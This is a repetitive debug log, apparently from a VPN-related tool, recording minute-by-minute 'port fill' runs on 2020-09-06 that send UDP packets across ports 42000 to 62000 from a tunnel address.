59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:22:05 +Starting port fill at 2020-09-06 05:23:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:23:05 +Starting port fill at 2020-09-06 05:24:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:24:04 +Starting port fill at 2020-09-06 05:25:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:25:04 +Starting port fill at 2020-09-06 05:26:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:26:05 +Starting port fill at 2020-09-06 05:27:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:27:05 +Starting port fill at 2020-09-06 05:28:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:28:04 +Starting port fill at 2020-09-06 05:29:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:29:04 +Starting port fill at 2020-09-06 05:30:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:30:04 +Starting port fill at 2020-09-06 05:31:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:31:04 +Starting port fill at 2020-09-06 05:32:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:32:05 +Starting port fill at 2020-09-06 05:33:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:33:04 +Starting port fill at 2020-09-06 05:34:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:34:05 +Starting port fill at 2020-09-06 05:35:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:35:05 +Starting port fill at 2020-09-06 05:36:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 05:36:07 +Starting port fill at 2020-09-06 05:37:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:37:06 +Starting port fill at 2020-09-06 05:38:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:38:05 +Starting port fill at 2020-09-06 05:39:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:39:06 +Starting port fill at 2020-09-06 05:40:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:40:05 +Starting port fill at 2020-09-06 05:41:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:41:05 +Starting port fill at 2020-09-06 05:42:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:42:06 +Starting port fill at 2020-09-06 05:43:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 05:43:06 +Starting port fill at 2020-09-06 05:44:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:44:06 